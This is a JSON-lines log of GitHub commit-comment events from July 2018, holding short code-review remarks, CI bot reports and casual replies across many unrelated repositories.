{"id":"7961297316","type":"CommitCommentEvent","actor":{"login":"RowlesP"},"repo":{"name":"makeitcheaper/BI.SSIS.Domestic"},"payload":{"comment":{"id":29697715,"position":null,"line":null,"path":null,"commit_id":"6e5788a7e7b6c3bf4e853a1d7a540a39378cf64c","created_at":"2018-07-13T10:14:40Z","updated_at":"2018-07-13T10:14:40Z","author_association":"COLLABORATOR","body":"Changed \"Select *\" in Populate GA Users Tables containers.\r\nChanged Truncate Domestic Campaign Categories to Delete From due to foreign key constraints.\r\nChanged order of population in Populate Base Tables so domestic.campaign_categories populates before domestic.campaigns due to foreign key constraint."}},"created_at":"2018-07-13T10:14:40Z"}
{"id":"7961298726","type":"CommitCommentEvent","actor":{"login":"ensonic"},"repo":{"name":"rishabhdeepsingh/robertalab"},"payload":{"comment":{"id":29697721,"position":6,"line":172,"path":"OpenRobertaParent/OpenRobertaServer/src/main/resources/create-tables.sql","commit_id":"a0614258f8d56cdefb9d7546482833945b756f19","created_at":"2018-07-13T10:14:58Z","updated_at":"2018-07-13T10:14:58Z","author_association":"NONE","body":"This seems to be defined here:\r\nhttps://github.com/OpenRoberta/robertalab/blob/HEAD/OpenRobertaParent/OpenRobertaServer/src/main/java/de/fhg/iais/roberta/persistence/bo/Role.java\r\n\r\nmaybe 'DONTCARE'.\r\n"}},"created_at":"2018-07-13T10:14:58Z"}
{"id":"7961298947","type":"CommitCommentEvent","actor":{"login":"nazneen-dapl"},"repo":{"name":"nazneen-dapl/workilo"},"payload":{"comment":{"id":29697723,"position":null,"line":null,"path":null,"commit_id":"8bc5243b17573cdfa55f426a220c484afa3f7a68","created_at":"2018-07-13T10:15:01Z","updated_at":"2018-07-13T10:15:01Z","author_association":"OWNER","body":"rghty"}},"created_at":"2018-07-13T10:15:01Z"}
{"id":"7961301972","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29697732,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-13T10:15:37Z","updated_at":"2018-07-13T10:15:37Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T10:15:37Z"}
{"id":"7961303356","type":"CommitCommentEvent","actor":{"login":"108lirik"},"repo":{"name":"nidzelska/demo-lab1"},"payload":{"comment":{"id":29697737,"position":null,"line":null,"path":null,"commit_id":"fe26cc8a5aa1b4d05f7d63c1d95373eb50545d5a","created_at":"2018-07-13T10:15:54Z","updated_at":"2018-07-13T10:15:54Z","author_association":"NONE","body":"pull this commit to master, please"}},"created_at":"2018-07-13T10:15:54Z"}
{"id":"7961309321","type":"CommitCommentEvent","actor":{"login":"WimSpee"},"repo":{"name":"bcbio/bcbio-nextgen"},"payload":{"comment":{"id":29697747,"position":null,"line":null,"path":null,"commit_id":"66cd479b899076492e90da348ea1fc1fd12c1b09","created_at":"2018-07-13T10:17:11Z","updated_at":"2018-07-13T10:17:11Z","author_association":"NONE","body":"Hi @chapmanb  I am not sure this part of the code is reached when using GATK. Both the documentation line and first part of the if statement seem to imply that the arguments are only added when **not** using GATK4?\r\n\r\n```\r\n # GATK4 selects the right HMM optimization automatically with FASTEST_AVAILABLE\r\n if not gatk_type == \"gatk4\"\r\n```"}},"created_at":"2018-07-13T10:17:11Z"}
{"id":"7961310606","type":"CommitCommentEvent","actor":{"login":"Ceridan"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29697751,"position":47,"line":47,"path":"Dodo.Tests/BoardsControllerTests.cs","commit_id":"3cce5ea7b475acab7f88152bacd789e4f4685f41","created_at":"2018-07-13T10:17:26Z","updated_at":"2018-07-13T10:17:26Z","author_association":"NONE","body":"Я с тобой согласен, но я не могу так сделать, так как сам тестируемый метод использует именно UUId.Empty"}},"created_at":"2018-07-13T10:17:26Z"}
{"id":"7961311773","type":"CommitCommentEvent","actor":{"login":"arush-sal"},"repo":{"name":"niki-1905/tk8"},"payload":{"comment":{"id":29697754,"position":4,"line":33,"path":"Gopkg.lock","commit_id":"5a9a862d9ce76240bc9f5dac99f95850ee86dfb3","created_at":"2018-07-13T10:17:41Z","updated_at":"2018-07-13T10:17:41Z","author_association":"NONE","body":"Could you please add the kubernauts package back to Gopkg.lock?"}},"created_at":"2018-07-13T10:17:41Z"}
{"id":"7961313240","type":"CommitCommentEvent","actor":{"login":"arush-sal"},"repo":{"name":"niki-1905/tk8"},"payload":{"comment":{"id":29697760,"position":9,"line":38,"path":"Gopkg.lock","commit_id":"5a9a862d9ce76240bc9f5dac99f95850ee86dfb3","created_at":"2018-07-13T10:18:00Z","updated_at":"2018-07-13T10:18:00Z","author_association":"NONE","body":"Could you please add the kubernauts package back to Gopkg.lock?"}},"created_at":"2018-07-13T10:18:00Z"}
{"id":"7961313310","type":"CommitCommentEvent","actor":{"login":"mabingqian"},"repo":{"name":"mabingqian/test"},"payload":{"comment":{"id":29697761,"position":187,"line":369,"path":".idea/workspace.xml","commit_id":"1dd6d382a4c43df2ca6613a4f8d32fac8a107303","created_at":"2018-07-13T10:18:01Z","updated_at":"2018-07-13T10:18:01Z","author_association":"OWNER","body":"good\r\n:+1: "}},"created_at":"2018-07-13T10:18:01Z"}
{"id":"7961319506","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance1"},"repo":{"name":"McAfeeInst1Org1/test2"},"payload":{"comment":{"id":29697772,"position":null,"line":null,"path":null,"commit_id":"107dedc39c028583dca8969f2c9bd9cf4d90bcc4","created_at":"2018-07-13T10:19:21Z","updated_at":"2018-07-13T10:19:21Z","author_association":"CONTRIBUTOR","body":"aaaa"}},"created_at":"2018-07-13T10:19:21Z"}
{"id":"7961323812","type":"CommitCommentEvent","actor":{"login":"jaceechan"},"repo":{"name":"cantonjs/claypot-wxapp-auth-plugin"},"payload":{"comment":{"id":29697780,"position":58,"line":92,"path":"src/index.js","commit_id":"6668d1f6af7e3e4ee1bf8d9e6e326b1d1f60c23e","created_at":"2018-07-13T10:20:16Z","updated_at":"2018-07-13T10:20:16Z","author_association":"CONTRIBUTOR","body":"ok"}},"created_at":"2018-07-13T10:20:16Z"}
{"id":"7961333181","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29697793,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-13T10:22:20Z","updated_at":"2018-07-13T10:22:20Z","author_association":"NONE","body":"159013173_Issue#6243 (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2974 of 2974 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-13T10:22:20Z"}
{"id":"7961363929","type":"CommitCommentEvent","actor":{"login":"WimSpee"},"repo":{"name":"bcbio/bcbio-nextgen"},"payload":{"comment":{"id":29697868,"position":null,"line":null,"path":null,"commit_id":"66cd479b899076492e90da348ea1fc1fd12c1b09","created_at":"2018-07-13T10:29:12Z","updated_at":"2018-07-13T10:29:12Z","author_association":"NONE","body":"No worries. :)  Thank your for extra commit."}},"created_at":"2018-07-13T10:29:12Z"}
{"id":"7961366934","type":"CommitCommentEvent","actor":{"login":"mutoe"},"repo":{"name":"slimkit/plus-small-screen-client"},"payload":{"comment":{"id":29697880,"position":null,"line":null,"path":null,"commit_id":"9ad229df5233c936c123dee0c0130b332c53b76f","created_at":"2018-07-13T10:29:51Z","updated_at":"2018-07-13T10:29:51Z","author_association":"COLLABORATOR","body":"😂"}},"created_at":"2018-07-13T10:29:51Z"}
{"id":"7961367071","type":"CommitCommentEvent","actor":{"login":"pocketjoso"},"repo":{"name":"snipsco/react-inview-monitor"},"payload":{"comment":{"id":29697882,"position":null,"line":null,"path":null,"commit_id":"60a657d9aabcd35d20cbee169c62274133612634","created_at":"2018-07-13T10:29:53Z","updated_at":"2018-07-13T10:29:53Z","author_association":"COLLABORATOR","body":"Hi, do you have a public url that you can share that I can look at to debug your problem? Last time I checked on iphone safari the `height: 100%` fix was enough. But maybe you are on a different iphone version - what's the model, and what is your mobile Safari version?"}},"created_at":"2018-07-13T10:29:53Z"}
{"id":"7961372212","type":"CommitCommentEvent","actor":{"login":"medeiva"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29697896,"position":11,"line":6,"path":"lesson4/cargoTrain.rb","commit_id":"ce92aff26557d0a34a481c4d59163d0129f50506","created_at":"2018-07-13T10:30:58Z","updated_at":"2018-07-13T10:30:58Z","author_association":"OWNER","body":"current_wagon - неправильно назвала, надо было как-нибудь по-другому"}},"created_at":"2018-07-13T10:30:58Z"}
{"id":"7961377872","type":"CommitCommentEvent","actor":{"login":"gurkaynak"},"repo":{"name":"pulp-platform/style-guidelines"},"payload":{"comment":{"id":29697910,"position":54,"line":93,"path":"README.md","commit_id":"19f16281a889ebeffdfd4aea381a6026408c3d2a","created_at":"2018-07-13T10:32:12Z","updated_at":"2018-07-13T10:32:12Z","author_association":"NONE","body":">>  (...) I am currently trying to give some feedback (**Florian is also \n>> contributing**) to that.\n>\n> I guess that's why Florian asked for our feedback/review of this and \n> appreciate the opportunity.\n\nI do not doubt that Florian had the best intentions of doing this, there \nare plenty of new people joining the effort, and it is good that there \nis an agreement on how to do things. On the other hand, we are not so \nmuch in a position to negotiate things with Google that depend on \npersonal preferences, so until Google decides to share the guidelines to \na wider audience let us not waste time discussing it. We are supposed to \nhave a meeting within a week on this with them and LowRISC people. I \nwould also have preferred to have a more open discussion, but this is \nthe way it is.\n\nI see some smaller things that are different between the Google SG and \nwhat Florian has asked for a review (2 spaces not 4 for indentation for \nexample, wrap at 100 not 72), UpperCamelCase for constants and \nparameters:\n\n“UpperCamelCase is only used to name an immutable constant. The \nexceptions are:\nWhen declaring a parameterized module, it is permissible to use ALL_CAPS \nto declare the parameters that the developer needs to override when \ninstantiating. This convention is both for historical reasons and to \ndistinguish true immutable constants from instantiation parameters.\nIt is permissible to separate numeric values with an underscore. For \nexample, IndexedThing_5_12”\n\nand several other smaller things. So either Florian adapts the present \ndocument to match 100% with the Google SG as it is at the moment, or we \nwait until the SG is released and try to discuss some exceptions for a \ncommon SG for our cooperations, trying to keep the number of exceptions \nto a minimum.\n\n>>  Things such as these (also prefix/suffix, camel not camel, 2/4 space \n>> indent) which do not have tangible technical implications but boil \n>> down to more or less personal preferences will most probably end up \n>> the way how Google currently prefers to have it.\n>\n> Like you, I do not want to waste our time bike-shedding. As long as \n> the established guidelines are based on principles instead of \n> precedence (or gut-feeeling preference), I am fine with them. I tried \n> to focus my feedback on spots where the principle is not clear to me, \n> asking for rationale or change. I suggest we do the same for \n> \"upstream\" feedback.\n\nLook I appreciate the feedback and the enthusiasm behind it. At this \npoint, I do not think there is an interest from the side of Google to \nmake major changes to their style guide unless there are strong \ntechnical reasons. There will be up to three SGs as far as I can \nunderstand.\n- The internal SG of Google, we have no influence on that\n- Google will derive an external SG taking into account some of the \nfeedback we have, this would probably be mostly the internal guide with \nsome exceptions added. From what I hear this will take a long time to \ncome out\n- There will be a SG for our working group that will come out much \nbefore the external SG and we will base our projects on this. This will \nbe based on the internal SG but we will probably have more freedom to \nmake adaptations. It is in our best interest to make sure that the \nexternal SG (which will eventually be released) matches this one \nclosely.\n\nI have already spent quite a bit of time discussing this with various \npeople, and explaining the situation. So please let us stop discussing \nthis further. If Florian has some BW, maybe he could adapt the current \nSG to match the Google SG so that everyone is aware of the current \nstate. The other option is to add a statement saying that we will be \nrevising the coding guidelines soon..\n\n\nThank you for your help\nKGF\n\n> -- \n> You are receiving this because you commented.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/pulp-platform/style-guidelines/commit/19f16281a889ebeffdfd4aea381a6026408c3d2a#commitcomment-29697296\n"}},"created_at":"2018-07-13T10:32:12Z"}
{"id":"7961378277","type":"CommitCommentEvent","actor":{"login":"cavy24"},"repo":{"name":"cavy24/React-Redux"},"payload":{"comment":{"id":29697912,"position":1,"line":1,"path":".gitignore","commit_id":"be3ce27da45671b83d5fc5e7b016ec435f7be33d","created_at":"2018-07-13T10:32:17Z","updated_at":"2018-07-13T10:32:17Z","author_association":"OWNER","body":"node_modules\r\n"}},"created_at":"2018-07-13T10:32:17Z"}
{"id":"7961383053","type":"CommitCommentEvent","actor":{"login":"YKilin"},"repo":{"name":"YKilin/CQ-picfinder-robot"},"payload":{"comment":{"id":29697918,"position":null,"line":null,"path":null,"commit_id":"00664731fba058c5d0a4e3c98e49c690971c91c6","created_at":"2018-07-13T10:33:22Z","updated_at":"2018-07-13T10:33:22Z","author_association":"OWNER","body":"由于 https://github.com/momocow/node-cq-websocket/issues/7 ，暂时取消入群相关功能"}},"created_at":"2018-07-13T10:33:22Z"}
{"id":"7961397951","type":"CommitCommentEvent","actor":{"login":"Perhelion"},"repo":{"name":"wikimedia/mediawiki-extensions-Thanks"},"payload":{"comment":{"id":29697937,"position":null,"line":null,"path":null,"commit_id":"7938e80daea0dd4515b6e00696cb6acd07a2ba5b","created_at":"2018-07-13T10:36:46Z","updated_at":"2018-07-13T10:36:46Z","author_association":"NONE","body":"needs to be `fill=\"#fff\"`"}},"created_at":"2018-07-13T10:36:46Z"}
{"id":"7961398080","type":"CommitCommentEvent","actor":{"login":"Tra4er"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29697938,"position":65,"line":80,"path":"src/components/post/Post.js","commit_id":"d54b3050b30cd449d8ba947fe834a015e858d0a6","created_at":"2018-07-13T10:36:48Z","updated_at":"2018-07-13T10:36:48Z","author_association":"NONE","body":"Ну блін. Якщо так робити то не було сенсу виносити в окремий компонент."}},"created_at":"2018-07-13T10:36:48Z"}
{"id":"7961405331","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"hnes/libaco"},"payload":{"comment":{"id":29697987,"position":null,"line":null,"path":null,"commit_id":"7290791cc1a2ee81ee04c3f85e6c16fe2b32fef6","created_at":"2018-07-13T10:38:29Z","updated_at":"2018-07-13T10:38:29Z","author_association":"NONE","body":"Such a make script might be temporarily useful for [your own software build experiments](https://github.com/hnes/libaco/commit/571c5b7d75bcd15c4eb81258c5cad9ac5bd5618e#diff-b67911656ef5d18c4ae36cb6741b7965L6 \"Fix a make file.\") while advanced development approaches will be safer and more powerful.\r\nYou could separate further development ideas on corresponding topic branches, couldn't you?"}},"created_at":"2018-07-13T10:38:29Z"}
{"id":"7961407286","type":"CommitCommentEvent","actor":{"login":"Tra4er"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29698003,"position":13,"line":16,"path":"src/containers/VisiblePostList.js","commit_id":"d54b3050b30cd449d8ba947fe834a015e858d0a6","created_at":"2018-07-13T10:38:57Z","updated_at":"2018-07-13T10:38:57Z","author_association":"NONE","body":"Naming Conventions\r\nAlways use the same naming convention for all your code. For example:\r\n\r\nVariable and function names written as camelCase\r\nGlobal variables written in UPPERCASE (We don't, but it's quite common)\r\nConstants (like PI) written in UPPERCASE"}},"created_at":"2018-07-13T10:38:57Z"}
{"id":"7961408051","type":"CommitCommentEvent","actor":{"login":"Tra4er"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29698012,"position":13,"line":16,"path":"src/containers/VisiblePostList.js","commit_id":"d54b3050b30cd449d8ba947fe834a015e858d0a6","created_at":"2018-07-13T10:39:07Z","updated_at":"2018-07-13T10:39:07Z","author_association":"NONE","body":"Constants (like PI) written in UPPERCASE"}},"created_at":"2018-07-13T10:39:07Z"}
{"id":"7961415365","type":"CommitCommentEvent","actor":{"login":"bWilsher"},"repo":{"name":"bWilsher/DoukiView"},"payload":{"comment":{"id":29698059,"position":null,"line":null,"path":null,"commit_id":"590380a28a3b872413c20a00e0d18072940cc2da","created_at":"2018-07-13T10:40:43Z","updated_at":"2018-07-13T10:40:43Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-13T10:40:43Z"}
{"id":"7961416560","type":"CommitCommentEvent","actor":{"login":"Tra4er"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29698068,"position":4,"line":10,"path":"src/containers/VisiblePostList.js","commit_id":"03eff78c096ce37384c1c86151539a4eb1d5e1b3","created_at":"2018-07-13T10:41:00Z","updated_at":"2018-07-13T10:41:00Z","author_association":"NONE","body":"https://reactjs.org/docs/react-component.html#unsafe_componentwillmount"}},"created_at":"2018-07-13T10:41:00Z"}
{"id":"7961417437","type":"CommitCommentEvent","actor":{"login":"Tqkhan"},"repo":{"name":"Tqkhan/itgs"},"payload":{"comment":{"id":29698078,"position":null,"line":null,"path":null,"commit_id":"a8142d740d6d1070a52702bd2a81a8fe02278dd7","created_at":"2018-07-13T10:41:12Z","updated_at":"2018-07-13T10:41:12Z","author_association":"OWNER","body":"nahi acha nahi kia wapas se development karo chalo niklo"}},"created_at":"2018-07-13T10:41:12Z"}
{"id":"7961433685","type":"CommitCommentEvent","actor":{"login":"Rishavbagga77"},"repo":{"name":"Rishavbagga77/Hello-World"},"payload":{"comment":{"id":29698177,"position":2,"line":2,"path":"Bagga","commit_id":"bd2c80cd3290f8ccd60e243f140d61cbd8968be3","created_at":"2018-07-13T10:44:55Z","updated_at":"2018-07-13T10:44:55Z","author_association":"OWNER","body":"I want to Roam"}},"created_at":"2018-07-13T10:44:55Z"}
{"id":"7961433783","type":"CommitCommentEvent","actor":{"login":"albandescottes"},"repo":{"name":"JeffreyGoncalves/OldAvatar"},"payload":{"comment":{"id":29698178,"position":null,"line":null,"path":null,"commit_id":"61eabbcc2c1caa0abd6859532f4718fa37b8969e","created_at":"2018-07-13T10:44:57Z","updated_at":"2018-07-13T10:44:57Z","author_association":"COLLABORATOR","body":"ok it's great"}},"created_at":"2018-07-13T10:44:57Z"}
{"id":"7961439719","type":"CommitCommentEvent","actor":{"login":"SilverFire"},"repo":{"name":"hiqdev/hipanel-faq"},"payload":{"comment":{"id":29698185,"position":9,"line":23,"path":"src/assets/faq/js/faq.js","commit_id":"96022f62d2ff8a8701388ce08e0cb1fd6f56e722","created_at":"2018-07-13T10:46:16Z","updated_at":"2018-07-13T10:46:16Z","author_association":"MEMBER","body":"Можно использовать уже созданную переменную current?"}},"created_at":"2018-07-13T10:46:16Z"}
{"id":"7961441106","type":"CommitCommentEvent","actor":{"login":"Rishavbagga77"},"repo":{"name":"Rishavbagga77/Hello-World"},"payload":{"comment":{"id":29698186,"position":1,"line":1,"path":"Bagga","commit_id":"bd2c80cd3290f8ccd60e243f140d61cbd8968be3","created_at":"2018-07-13T10:46:34Z","updated_at":"2018-07-13T10:46:34Z","author_association":"OWNER","body":"hui\r\n"}},"created_at":"2018-07-13T10:46:34Z"}
{"id":"7961442076","type":"CommitCommentEvent","actor":{"login":"Herny64"},"repo":{"name":"qutebrowser/qutebrowser"},"payload":{"comment":{"id":29698188,"position":null,"line":null,"path":null,"commit_id":"43e58ac865ff862c2008c510fc5f7627e10b4660","created_at":"2018-07-13T10:46:47Z","updated_at":"2018-07-13T10:46:47Z","author_association":"NONE","body":"Hi I want to disable stuff I don't need/use so I put \"settings\" in the blocked-hosts file in .config/qutebrowser.\r\nIs there a better way like a config option for completely disabling this feature  ?"}},"created_at":"2018-07-13T10:46:47Z"}
{"id":"7961442559","type":"CommitCommentEvent","actor":{"login":"Rishavbagga77"},"repo":{"name":"Rishavbagga77/Hello-World"},"payload":{"comment":{"id":29698190,"position":2,"line":2,"path":"Bagga","commit_id":"bd2c80cd3290f8ccd60e243f140d61cbd8968be3","created_at":"2018-07-13T10:46:53Z","updated_at":"2018-07-13T10:46:53Z","author_association":"OWNER","body":"really"}},"created_at":"2018-07-13T10:46:53Z"}
{"id":"7961444504","type":"CommitCommentEvent","actor":{"login":"Jessehaslam1983"},"repo":{"name":"Jessehaslam1983/opensource.guide"},"payload":{"comment":{"id":29698192,"position":19,"line":19,"path":"assets/js/locale.js","commit_id":"42ee0b011761ba6908f7014f3e24169a0d84c6b5","created_at":"2018-07-13T10:47:20Z","updated_at":"2018-07-13T10:47:20Z","author_association":"OWNER","body":"[text.txt](https://github.com/Jessehaslam1983/opensource.guide/files/2192326/text.txt)\r\n"}},"created_at":"2018-07-13T10:47:20Z"}
{"id":"7961444629","type":"CommitCommentEvent","actor":{"login":"import-yuefeng"},"repo":{"name":"listen-now/listen-now"},"payload":{"comment":{"id":29698193,"position":null,"line":null,"path":null,"commit_id":"d0ec4f4372c570033ca14147e33a897a5c080098","created_at":"2018-07-13T10:47:22Z","updated_at":"2018-07-13T10:47:22Z","author_association":"MEMBER","body":"回退版本"}},"created_at":"2018-07-13T10:47:22Z"}
{"id":"7961448268","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29698203,"position":null,"line":null,"path":null,"commit_id":"59ff45eb29c40e0a0e5140e8e5aba70204d202ae","created_at":"2018-07-13T10:48:09Z","updated_at":"2018-07-13T10:48:09Z","author_association":"COLLABORATOR","body":"<h3>[OverflowList] Fix order of overflow items (#2621)</h3>\n\nPreview: <strong><a href='https://18544-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18544-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18544-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-13T10:48:09Z"}
{"id":"7961451447","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29698210,"position":null,"line":null,"path":null,"commit_id":"5de2fdd31f618a272bc72c8c41f8bad528ccce06","created_at":"2018-07-13T10:48:45Z","updated_at":"2018-07-13T10:48:45Z","author_association":"COLLABORATOR","body":"<h3>[OverflowList] Add minimum visible items prop (#2623)</h3>\n\nPreview: <strong><a href='https://18545-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18545-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18545-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-13T10:48:45Z"}
{"id":"7961456548","type":"CommitCommentEvent","actor":{"login":"dubhater"},"repo":{"name":"HomeOfVapourSynthEvolution/havsfunc"},"payload":{"comment":{"id":29698223,"position":null,"line":null,"path":null,"commit_id":"d58d68134934dfc49153116c4edc1ab46e333877","created_at":"2018-07-13T10:49:54Z","updated_at":"2018-07-13T10:49:54Z","author_association":"NONE","body":"Thanks. Was r1 the latest?"}},"created_at":"2018-07-13T10:49:54Z"}
{"id":"7961458382","type":"CommitCommentEvent","actor":{"login":"niki-1905"},"repo":{"name":"niki-1905/tk8"},"payload":{"comment":{"id":29698227,"position":9,"line":38,"path":"Gopkg.lock","commit_id":"5a9a862d9ce76240bc9f5dac99f95850ee86dfb3","created_at":"2018-07-13T10:50:19Z","updated_at":"2018-07-13T10:50:19Z","author_association":"OWNER","body":"Sure."}},"created_at":"2018-07-13T10:50:19Z"}
{"id":"7961459221","type":"CommitCommentEvent","actor":{"login":"vanitasvitae"},"repo":{"name":"bcgit/bc-java"},"payload":{"comment":{"id":29698229,"position":121,"line":3250,"path":"pg/src/test/java/org/bouncycastle/openpgp/test/PGPKeyRingTest.java","commit_id":"486c6d3f18422c77e52b74061bc315d582c9e8cc","created_at":"2018-07-13T10:50:30Z","updated_at":"2018-07-13T10:50:30Z","author_association":"CONTRIBUTOR","body":"I would maybe remove the `(they don't)` from the comment :)"}},"created_at":"2018-07-13T10:50:30Z"}
{"id":"7961460788","type":"CommitCommentEvent","actor":{"login":"ningyuansg"},"repo":{"name":"source-academy/cadet-frontend"},"payload":{"comment":{"id":29698235,"position":9,"line":37,"path":"src/reducers/states.ts","commit_id":"80482b4d96675250109da7a06e2a95b07c19d6a3","created_at":"2018-07-13T10:50:50Z","updated_at":"2018-07-13T10:50:50Z","author_association":"MEMBER","body":"Nevermind, I figured it out. This is the key that points to the playground workspace. Didn't see line 31 above."}},"created_at":"2018-07-13T10:50:50Z"}
{"id":"7961469918","type":"CommitCommentEvent","actor":{"login":"chanikya494"},"repo":{"name":"chanikya494/chanikya"},"payload":{"comment":{"id":29698255,"position":4,"line":4,"path":"index.html","commit_id":"7441e6b454098742c9ab80ca7680db4d14cc4d7e","created_at":"2018-07-13T10:52:56Z","updated_at":"2018-07-13T10:52:56Z","author_association":"OWNER","body":"ding"}},"created_at":"2018-07-13T10:52:56Z"}
{"id":"7961470413","type":"CommitCommentEvent","actor":{"login":"jacekokrojek"},"repo":{"name":"JaroslawSobieszek/Generatory"},"payload":{"comment":{"id":29698256,"position":7,"line":7,"path":"spec/NipSpecs.js","commit_id":"bbd8e66192e3b8cd928eaaba2c21139383f78f34","created_at":"2018-07-13T10:53:03Z","updated_at":"2018-07-13T10:53:03Z","author_association":"COLLABORATOR","body":"The test above verifies: content, length and also last digit generation so other test are not needed. Please remove them"}},"created_at":"2018-07-13T10:53:03Z"}
{"id":"7961475552","type":"CommitCommentEvent","actor":{"login":"jacekokrojek"},"repo":{"name":"JaroslawSobieszek/Generatory"},"payload":{"comment":{"id":29698267,"position":12,"line":11,"path":"spec/RegonSpecs.js","commit_id":"bbd8e66192e3b8cd928eaaba2c21139383f78f34","created_at":"2018-07-13T10:54:14Z","updated_at":"2018-07-13T10:54:14Z","author_association":"COLLABORATOR","body":"Here, similarly to the nip test, you don't need tests that checks length and last digit generation"}},"created_at":"2018-07-13T10:54:14Z"}
{"id":"7961477592","type":"CommitCommentEvent","actor":{"login":"The-Compiler"},"repo":{"name":"qutebrowser/qutebrowser"},"payload":{"comment":{"id":29698271,"position":null,"line":null,"path":null,"commit_id":"43e58ac865ff862c2008c510fc5f7627e10b4660","created_at":"2018-07-13T10:54:39Z","updated_at":"2018-07-13T10:54:39Z","author_association":"COLLABORATOR","body":"@Herny64 With this patch, all requests to `qute://settings/set` will already be denied as long as you never open `qute://settings` (e.g. via `:set`), because no CSRF token has been generated yet (so it's always wrong, no matter what's sent in the request)."}},"created_at":"2018-07-13T10:54:39Z"}
{"id":"7961479629","type":"CommitCommentEvent","actor":{"login":"MattyGlen123"},"repo":{"name":"MattyGlen123/product-landing-page.github.io"},"payload":{"comment":{"id":29698281,"position":null,"line":null,"path":null,"commit_id":"ba461ea21bbffd78527ba8b78b02de2c730f0fa1","created_at":"2018-07-13T10:55:08Z","updated_at":"2018-07-13T10:55:08Z","author_association":"OWNER","body":"#2 \r\nApplied new colours to contact section text, adjusted line height of p tags."}},"created_at":"2018-07-13T10:55:08Z"}
{"id":"7961482573","type":"CommitCommentEvent","actor":{"login":"SCK22"},"repo":{"name":"SCK22/ModelBuilding"},"payload":{"comment":{"id":29698295,"position":null,"line":null,"path":null,"commit_id":"0b1b61e6c09647758e603b1c126ce4a9f0fb941f","created_at":"2018-07-13T10:55:46Z","updated_at":"2018-07-13T10:55:46Z","author_association":"OWNER","body":"Basic Deep Learning Models"}},"created_at":"2018-07-13T10:55:46Z"}
{"id":"7961485507","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29698304,"position":26,"line":46,"path":"src/main/java/ml/duncte123/skybot/Settings.java","commit_id":"c7a590f4823f766f039b19d7b667ff2d512b28cf","created_at":"2018-07-13T10:56:24Z","updated_at":"2018-07-13T10:56:24Z","author_association":"MEMBER","body":"This will break the tests, please fix "}},"created_at":"2018-07-13T10:56:24Z"}
